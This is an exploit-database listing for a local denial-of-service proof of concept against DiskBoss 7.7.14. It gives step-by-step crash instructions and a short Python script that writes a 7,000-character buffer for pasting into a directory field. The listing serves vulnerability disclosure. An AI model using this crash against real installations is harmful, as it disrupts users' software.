DiskBoss 7.7.14 - Denial of Service (PoC)

vendor:

DiskBoss

by:

Paras Bhatia

N/A

CVSS

N/A

Denial of Service (DoS) Local

CWE

Product Name: DiskBoss

Affected Version From: 7.7.14

Affected Version To: 7.7.14

Patch Exists: NO

Related CWE:

CPE:

Metasploit:

Other Scripts:

Platforms Tested: Windows 7 Ultimate Service Pack 1 (32 bit - English)

2020

DiskBoss 7.7.14 – Denial of Service (PoC)

This exploit causes a denial of service (DoS) in DiskBoss version 7.7.14. By running a Python script that generates a large buffer and copying it to the clipboard, the exploit crashes the DiskBoss application when attempting to add the buffer as an input directory.

Mitigation:

Unknown

Source

Exploit-DB raw data:

# Exploit Title: DiskBoss 7.7.14 - Denial of Service (PoC) 
# Date: 2020-04-01
# Exploit Author: Paras Bhatia
# Vendor Homepage: https://www.diskboss.com/ 
# Software Link Download: https://github.com/x00x00x00x00/diskboss_7.7.14/raw/master/diskboss_setup_v7.7.14.exe
# Vulnerable Software: DiskBoss
# Version: 7.7.14
# Vulnerability Type: Denial of Service (DoS) Local
# Tested on: Windows 7 Ultimate Service Pack 1 (32 bit - English)  

#Steps to Produce the Crash:

#   1.- Run python code: DiskbossCrash.py
#   2.- Copy content to clipboard
#   3.- Open "diskboss.exe" (diskbsg.exe)
#   4.- Go to "Command" > Search Files
#   5.- Click on second + icon (located at right side of "Search Disks, Directories and Network Shares")
#   6.- Click on " Add Input Directory"
#   7.- Paste ClipBoard into the "Directory" field
#   8.- Click on OK
#   9.- Crashed

#Python "DiskbossCrash.py" Code:
   
buffer = "\x41" * 7000
f = open ("DiskbossCrash.txt", "w")
f.write(buffer)
f.close()